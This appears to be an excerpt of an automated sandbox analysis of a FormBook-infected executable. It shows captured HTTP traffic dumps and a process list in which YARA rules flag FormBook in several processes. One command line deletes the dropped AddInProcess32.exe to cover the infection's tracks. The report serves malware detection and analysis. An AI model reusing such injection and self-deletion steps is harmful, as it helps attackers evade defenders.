                                                                    2021-10-27 14:29:02 UTC8INData Raw: 74 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 39 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 36 63 20 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e
                                                                    Data Ascii: t:visited{color:#900 !important}.gbmt,.gbml1,.gbmlb,.gbmt:visited,.gbml1:visited,.gbmlb:visited{color:#36c !important;text-decoration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin
                                                                    2021-10-27 14:29:02 UTC10INData Raw: 74 63 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 2e 47 42 4d 43 43 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 2c 23 47 42 4d 50 41 4c 3a 6c 61 73 74 2d 63 68 69 6c 64 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 27 5c 30 41 5c 30 41 27 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62
                                                                    Data Ascii: tc{padding:0;margin:0;line-height:27px}.GBMCC:last-child:after,#GBMPAL:last-child:after{content:'\0A\0A';white-space:pre;position:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-b
                                                                    2021-10-27 14:29:02 UTC11INData Raw: 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 67 62 6d 70 61 73 62 20 2e 67 62 70 73 7b 63 6f 6c 6f 72 3a 23 30 30 30 7d 23 67 62 6d 70 61 6c 20 2e 67 62 71 66 62 62 7b 6d 61 72 67 69 6e 3a 30 20 32 30 70 78 7d 2e 67 62 70 30 20 2e 67 62 70 73 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 61 2e 67 62 69 62 61 7b 6d 61 72 67 69 6e 3a 38 70 78 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73
                                                                    Data Ascii: ght:0;text-align:right}#gbmpasb .gbps{color:#000}#gbmpal .gbqfbb{margin:0 20px}.gbp0 .gbps{*display:inline}a.gbiba{margin:8px 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{dis
                                                                    2021-10-27 14:29:02 UTC12INData Raw: 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 67 62 71 66 62 2d 68 76 72 2c 2e 67 62 71 66 62 61 2d 68 76 72 2c 2e 67 62 71 66 62 62 2d 68 76 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 61 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d
                                                                    Data Ascii: shadow:none;box-shadow:none}.gbqfb-hvr,.gbqfba-hvr,.gbqfbb-hvr{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.1);-moz-box-shadow:0 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1)}.gbqfb::-moz-focus-inner,.gbqfba::-moz-focus-inner,.gbqfbb::-moz-focus-
                                                                    2021-10-27 14:29:02 UTC14INData Raw: 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 34 64 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30
                                                                    Data Ascii: adient(top,#4d90fe,#357ae8);background-image:-o-linear-gradient(top,#4d90fe,#357ae8);background-image:linear-gradient(top,#4d90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0
                                                                    2021-10-27 14:29:02 UTC15INData Raw: 4d 69 63 72 6f 73 6f 66 74 2e 67 72 61 64 69 65 6e 74 28 73 74 61 72 74 43 6f 6c 6f 72 53 74 72 3d 27 23 66 38 66 38 66 38 27 2c 45 6e 64 43 6f 6c 6f 72 53 74 72 3d 27 23 66 31 66 31 66 31 27 29 7d 2e 67 62 71 66 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61
                                                                    Data Ascii: Microsoft.gradient(startColorStr='#f8f8f8',EndColorStr='#f1f1f1')}.gbqfbb{background-color:#fff;background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-ima
                                                                    2021-10-27 14:29:02 UTC16INData Raw: 65 2c 2e 67 62 71 66 62 62 3a 61 63 74 69 76 65 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b
                                                                    Data Ascii: e,.gbqfbb:active{-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);-moz-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;
                                                                    2021-10-27 14:29:02 UTC17INData Raw: 6f 72 2d 73 74 6f 70 28 30 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 2e 35 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 38 29 29 2c 63 6f 6c 6f 72 2d 73 74 6f 70 28 31 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30
                                                                    Data Ascii: or-stop(0,rgba(0,0,0,.1)),color-stop(.5,rgba(0,0,0,.8)),color-stop(1,rgba(0,0,0,.1)));background:-webkit-gradient(linear,left bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0
                                                                    2021-10-27 14:29:02 UTC19INData Raw: 6d 61 72 67 69 6e 3a 32 70 78 20 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 6c 73 62 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 39 66 61 3b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 31 70 78 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 61 64 63 65 30 20 23 37 30 37 35 37 61 20 23 37 30 37 35 37 61 20 23 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30
                                                                    Data Ascii: margin:2px 0;margin-left:13px;font-size:11px}.lsbb{background:#f8f9fa;border:solid 1px;border-color:#dadce0 #70757a #70757a #dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0
                                                                    2021-10-27 14:29:02 UTC20INData Raw: 63 62 0d 0a 21 62 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6e 2b 2b 3b 65 3d 65 7c 7c 7b 7d 3b 62 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 3b 76 61 72 20 63 3d 22 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 65 69 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 49 29 3b 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 26 26 28 63 2b 3d 22 26 6a 65 78 70 69 64 3d 22 2b 62 28 67 6f 6f 67 6c 65 2e 6b 45 58 50 49 29 29 3b 63 2b 3d 22 26 73 72 63 70 67 3d 22 2b 62 28 71 2e 73 70 29 2b 22 26 6a 73 72 3d 22 2b 62 28 71 2e 6a 73 72 29 2b 22 26 62 76 65 72 3d 22 2b 62 28 71 2e 62 76 29 2b 28 22 26 6a 73 65 6c 3d 22 2b 64 29 0d 0a
                                                                    Data Ascii: cb!b)return null;n++;e=e||{};b=encodeURIComponent;var c="/gen_204?atyp=i&ei="+b(google.kEI);google.kEXPI&&(c+="&jexpid="+b(google.kEXPI));c+="&srcpg="+b(q.sp)+"&jsr="+b(q.jsr)+"&bver="+b(q.bv)+("&jsel="+d)


System Behavior

General

Start time: 16:28:59
Start date: 27/10/2021
Path: C:\Users\user\Desktop\583475.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\583475.exe'
Imagebase: 0x840000
File size: 1085952 bytes
MD5 hash: 721356BFA1F8C23D40F6B2FF77B55DB0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.745714719.0000000003CBD000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.746396498.0000000003DF5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.745995404.0000000003D29000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 16:29:36
Start date: 27/10/2021
Path: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase: 0x890000
File size: 42080 bytes
MD5 hash: F2A47587431C466535F3C3D3427724BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.830002490.0000000000D90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.733674390.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.734058524.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.829890254.0000000000D40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Antivirus matches:
                                                                    • Detection: 0%, Metadefender
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:16:29:41
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff6fee60000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.786309842.000000000DA38000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.768614516.000000000DA38000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:30:18
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\autofmt.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                    Imagebase:0x820000
                                                                    File size:831488 bytes
                                                                    MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:16:30:20
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                    Imagebase:0x9d0000
                                                                    File size:82944 bytes
                                                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.920475914.0000000000DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.921089072.0000000002E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.921231114.0000000002F90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:16:30:23
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                    Imagebase:0x11d0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:16:30:24
                                                                    Start date:27/10/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff724c50000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
